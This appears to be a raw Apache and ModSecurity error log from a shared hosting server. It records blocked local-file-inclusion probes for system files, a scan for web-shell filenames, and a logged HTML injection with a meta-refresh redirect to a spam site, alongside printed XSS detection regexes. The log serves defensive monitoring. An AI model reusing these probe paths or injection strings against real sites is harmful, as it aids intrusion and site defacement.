[Mon May 11 18:14:46.667075 2026] [security2:error] [pid 1412074:tid 1412087] [client 216.73.216.110:31030] ModSecurity: Warning. Matched phrase ".bash_logout" at ARGS:edit. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .bash_logout found within ARGS:edit: .bash_logout"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agIAdjJnyuKVXoStDhbc4wAAAEs"]
[Mon May 11 18:14:46.667838 2026] [security2:error] [pid 1412074:tid 1412087] [client 216.73.216.110:31030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agIAdjJnyuKVXoStDhbc4wAAAEs"]
[Mon May 11 18:14:46.764418 2026] [security2:error] [pid 1412074:tid 1412087] [client 216.73.216.110:31030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIAdjJnyuKVXoStDhbc4wAAAEs"]
PHP Warning:  filesize(): stat failed for /proc/897/task/897/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/897/task/897/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/897/task/897/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/897/task/897/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/897/task/897/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/897/task/897/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 18:15:18.814394 2026] [authz_core:error] [pid 1411099:tid 1411109] [client 216.73.216.110:24858] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/lib/class/phpmailer/test/error_log
[Mon May 11 18:15:47.534198 2026] [ssl:error] [pid 1411099:tid 1411107] (EAI 2)Name or service not known: [client 216.157.40.94:59666] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:15:47.534243 2026] [ssl:error] [pid 1411099:tid 1411107] AH01941: stapling_renew_response: responder error
[Mon May 11 18:15:47.873283 2026] [ssl:error] [pid 1412074:tid 1412100] (EAI 2)Name or service not known: [client 216.157.40.94:14550] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:15:47.873320 2026] [ssl:error] [pid 1412074:tid 1412100] AH01941: stapling_renew_response: responder error
[Mon May 11 18:15:48.504172 2026] [ssl:error] [pid 1412074:tid 1412092] (EAI 2)Name or service not known: [client 216.157.40.86:17714] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:15:48.504199 2026] [ssl:error] [pid 1412074:tid 1412092] AH01941: stapling_renew_response: responder error
[Mon May 11 18:15:49.166559 2026] [ssl:error] [pid 1416109:tid 1416131] (EAI 2)Name or service not known: [client 216.157.40.64:52809] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:15:49.166604 2026] [ssl:error] [pid 1416109:tid 1416131] AH01941: stapling_renew_response: responder error
[Mon May 11 18:15:49.499987 2026] [ssl:error] [pid 1424905:tid 1424920] (EAI 2)Name or service not known: [client 216.157.40.84:46507] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:15:49.500028 2026] [ssl:error] [pid 1424905:tid 1424920] AH01941: stapling_renew_response: responder error
[Mon May 11 18:15:49.819809 2026] [ssl:error] [pid 1411099:tid 1411121] (EAI 2)Name or service not known: [client 216.157.40.88:3092] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:15:49.819843 2026] [ssl:error] [pid 1411099:tid 1411121] AH01941: stapling_renew_response: responder error
[Mon May 11 18:15:50.466943 2026] [ssl:error] [pid 1416109:tid 1416153] (EAI 2)Name or service not known: [client 216.157.40.92:28292] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:15:50.466982 2026] [ssl:error] [pid 1416109:tid 1416153] AH01941: stapling_renew_response: responder error
[Mon May 11 18:15:51.120034 2026] [ssl:error] [pid 1411055:tid 1411077] (EAI 2)Name or service not known: [client 216.157.40.88:38693] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:15:51.120085 2026] [ssl:error] [pid 1411055:tid 1411077] AH01941: stapling_renew_response: responder error
[Mon May 11 18:15:52.203147 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/file.php
[Mon May 11 18:15:52.374116 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/gettest.php
[Mon May 11 18:15:52.545396 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/gg.php
[Mon May 11 18:15:52.745732 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/goods.php
[Mon May 11 18:15:52.926276 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/maintenance.php
[Mon May 11 18:15:53.099225 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/info.php
[Mon May 11 18:15:53.270110 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/users.php
[Mon May 11 18:15:53.440636 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/install.php
[Mon May 11 18:15:53.611398 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/item.php
[Mon May 11 18:15:53.782075 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/jga.php
[Mon May 11 18:15:53.954577 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/leaf.php
[Mon May 11 18:15:54.127619 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/ms-files.php
[Mon May 11 18:15:54.300579 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/lock.php
[Mon May 11 18:15:54.472764 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/wp-blog-header.php
[Mon May 11 18:15:54.651028 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/lock360.php
[Mon May 11 18:15:54.824063 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/log.php
[Mon May 11 18:15:54.994670 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/manager.php
[Mon May 11 18:15:55.168270 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/meta.php
[Mon May 11 18:15:55.351129 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/mini.php
[Mon May 11 18:15:55.525542 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/mjq.php
[Mon May 11 18:15:55.698277 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/new.php
[Mon May 11 18:15:55.872580 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/onclickfuns.php
[Mon May 11 18:15:56.046115 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/option.php
[Mon May 11 18:15:56.219644 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/plugin-editor.php
[Mon May 11 18:15:56.392605 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/profile.php
[Mon May 11 18:15:56.566711 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/qw_03b4ad31.php
[Mon May 11 18:15:56.751239 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/radio.php
[Mon May 11 18:15:56.922317 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/sf.php
[Mon May 11 18:15:57.096896 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/simple.php
[Mon May 11 18:15:57.286054 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/sql.php
[Mon May 11 18:15:57.457063 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/test.php
[Mon May 11 18:15:57.627987 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/test1.php
[Mon May 11 18:15:57.819463 2026] [ssl:error] [pid 1412074:tid 1412096] (EAI 2)Name or service not known: [client 3.252.255.253:60100] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 18:15:57.819508 2026] [ssl:error] [pid 1412074:tid 1412096] AH01941: stapling_renew_response: responder error
[Mon May 11 18:15:57.823443 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/themes.php
[Mon May 11 18:15:58.166092 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/wp-admin.php
[Mon May 11 18:15:58.510882 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/wp-blog-header.php
[Mon May 11 18:15:58.681710 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/wp-config-sample.php
[Mon May 11 18:15:59.556221 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/wp.php
[Mon May 11 18:15:59.909383 2026] [:error] [pid 1411099:tid 1411110] [client 4.193.137.131:4176] File does not exist: /home/pweilcom/public_html/xmlrpc.php
[Mon May 11 18:17:20.277440 2026] [authz_core:error] [pid 1412074:tid 1412085] [client 194.163.174.253:51870] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/error_log, referer: binance.com
[Mon May 11 18:17:34.287688 2026] [authz_core:error] [pid 1411055:tid 1411068] [client 194.163.174.253:55825] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/error_log, referer: binance.com
[Mon May 11 18:18:07.696989 2026] [core:error] [pid 1412074:tid 1412100] [client 74.7.175.188:35432] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:18:07.697109 2026] [core:error] [pid 1412074:tid 1412100] [client 74.7.175.188:35432] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:18:07.832724 2026] [core:error] [pid 1411099:tid 1411292] [client 74.7.241.144:34984] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:18:07.832754 2026] [core:error] [pid 1411099:tid 1411292] [client 74.7.241.144:34984] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:18:09.406144 2026] [core:error] [pid 1411201:tid 1411250] [client 74.7.230.41:57878] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:18:09.406197 2026] [core:error] [pid 1411201:tid 1411250] [client 74.7.230.41:57878] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:18:12.561700 2026] [core:error] [pid 1411055:tid 1411062] [client 74.7.230.56:56974] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:18:12.561726 2026] [core:error] [pid 1411055:tid 1411062] [client 74.7.230.56:56974] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:18:21.676437 2026] [security2:error] [pid 1412074:tid 1412078] [client 43.134.236.33:51540] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.naturedetres.fr"] [uri "/"] [unique_id "agIBTTJnyuKVXoStDhbd8wAAAEI"]
[Mon May 11 18:19:31.845104 2026] [security2:error] [pid 1411201:tid 1411253] [client 43.134.121.208:60918] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/la-brasserie/"] [unique_id "agIBk_y_GXSWIKeli0sbyQAAAIc"]
[Mon May 11 18:19:40.130312 2026] [security2:error] [pid 1411055:tid 1411061] [client 43.156.168.214:53160] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/nos-realisations"] [unique_id "agIBnEWKUxpmnkK7zHyn4AAAAQQ"]
[Mon May 11 18:19:45.883047 2026] [security2:error] [pid 1411201:tid 1411264] [client 43.156.168.214:60914] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/nos-realisations/"] [unique_id "agIBofy_GXSWIKeli0sb1gAAAJI"], referer: https://letamsgarage.fr/nos-realisations#recentes
[Mon May 11 18:19:51.126946 2026] [security2:error] [pid 1411055:tid 1411077] [client 216.73.216.110:57251] ModSecurity: Warning. Matched phrase "var/log/boot.log" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/boot.log found within ARGS:filesrc: /var/log/boot.log-20240913"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIBp0WKUxpmnkK7zHyn8QAAARQ"]
[Mon May 11 18:19:51.127684 2026] [security2:error] [pid 1411055:tid 1411077] [client 216.73.216.110:57251] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIBp0WKUxpmnkK7zHyn8QAAARQ"]
[Mon May 11 18:19:51.224484 2026] [security2:error] [pid 1411055:tid 1411077] [client 216.73.216.110:57251] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIBp0WKUxpmnkK7zHyn8QAAARQ"]
[Mon May 11 18:20:05.277244 2026] [security2:error] [pid 1411055:tid 1411062] [client 57.141.20.28:28876] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:d. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:d: daleiden.com/__media__/js/netsoltrademark.php?d=ec.l.i.pses.r.iw@cenovis.the-m.co.kr/?a[]=<a href=https://allfrequencyjammer.com/category/gps-jammer-kit/>gps jamming protection</a><meta http-equiv=refresh content=0;url=https://allfrequencyjammer.com/category/gps-jammer-kit/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/__media__/js/netsoltrademark.php"] [unique_id "agIBtUWKUxpmnkK7zHyoBwAAAQU"]
[Mon May 11 18:20:05.281862 2026] [security2:error] [pid 1411055:tid 1411062] [client 57.141.20.28:28876] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: daleiden.com/__media__/js/netsoltrademark.php?d=Ec.L.I.Pses.R.Iw@cenovis.the-m.co.kr/?a[]=<a href=https://Allfrequencyjammer.com/category/gps-jammer-kit/>gps jamming Protection</a><meta http-equiv=refresh content=0;url=https://allfrequencyjammer.com/category/gps-jammer-kit/ /> found within ARGS:d: daleiden.com/__media__/js/netsoltrademark.php?d=Ec.L.I.Pses.R.Iw@cenovis.the-m.co.kr/?a[]=<a href=https://Allfrequencyjammer.com/category/gps-jammer-kit/>gps jamming Protection</a><meta http-equiv..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/__media__/js/netsoltrademark.php"] [unique_id "agIBtUWKUxpmnkK7zHyoBwAAAQU"]
[Mon May 11 18:20:05.285609 2026] [security2:error] [pid 1411055:tid 1411062] [client 57.141.20.28:28876] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:d. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://allfrequencyjammer.com/category/gps-jammer-kit/ /> found within ARGS:d: daleiden.com/__media__/js/netsoltrademark.php?d=Ec.L.I.Pses.R.Iw@cenovis.the-m.co.kr/?a[]=<a href=https://Allfrequencyjammer.com/category/gps-jammer-kit/>gps jamming Protection</a><meta http-equiv=refresh content=0;url=https://allfrequencyjammer.com/category/gps-jammer-kit/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCT [hostname "www.piregwan-genesis.com"] [uri "/__media__/js/netsoltrademark.php"] [unique_id "agIBtUWKUxpmnkK7zHyoBwAAAQU"]
[Mon May 11 18:20:05.287750 2026] [security2:error] [pid 1411055:tid 1411062] [client 57.141.20.28:28876] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:d. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:d: daleiden.com/__media__/js/netsoltrademark.php?d=Ec.L.I.Pses.R.Iw@cenovis.the-m.co.kr/?a[]=<a href=https://Allfrequencyjammer.com/category/gps-jammer-kit/>gps jamming Protection</a><meta http-equiv=refresh content=0;url=https://allfrequencyjammer.com/category/gps-jammer-kit/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "W [hostname "www.piregwan-genesis.com"] [uri "/__media__/js/netsoltrademark.php"] [unique_id "agIBtUWKUxpmnkK7zHyoBwAAAQU"]
[Mon May 11 18:20:05.291452 2026] [security2:error] [pid 1411055:tid 1411062] [client 57.141.20.28:28876] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:d. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:d: daleiden.com/__media__/js/netsoltrademark.php?d=Ec.L.I.Pses.R.Iw@cenovis.the-m.co.kr/?a[]=<a href=https://Allfrequencyjammer.com/category/gps-jammer-kit/>gps jamming Protection</a><meta http-equiv=refresh content=0;url=https://allfrequencyjammer.com/category/gps-jammer-kit/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSenso [hostname "www.piregwan-genesis.com"] [uri "/__media__/js/netsoltrademark.php"] [unique_id "agIBtUWKUxpmnkK7zHyoBwAAAQU"]
[Mon May 11 18:20:05.291901 2026] [security2:error] [pid 1411055:tid 1411062] [client 57.141.20.28:28876] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/__media__/js/netsoltrademark.php"] [unique_id "agIBtUWKUxpmnkK7zHyoBwAAAQU"]
[Mon May 11 18:20:05.292180 2026] [security2:error] [pid 1411055:tid 1411062] [client 57.141.20.28:28876] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/__media__/js/netsoltrademark.php"] [unique_id "agIBtUWKUxpmnkK7zHyoBwAAAQU"]
